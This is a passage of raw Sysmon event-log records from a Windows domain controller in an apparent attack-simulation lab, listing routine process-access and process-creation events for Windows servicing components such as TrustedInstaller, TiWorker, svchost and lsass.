13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.153{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000009883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0A00-00000000A301}8481960C:\Windows\system32\services.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.106{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000009869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51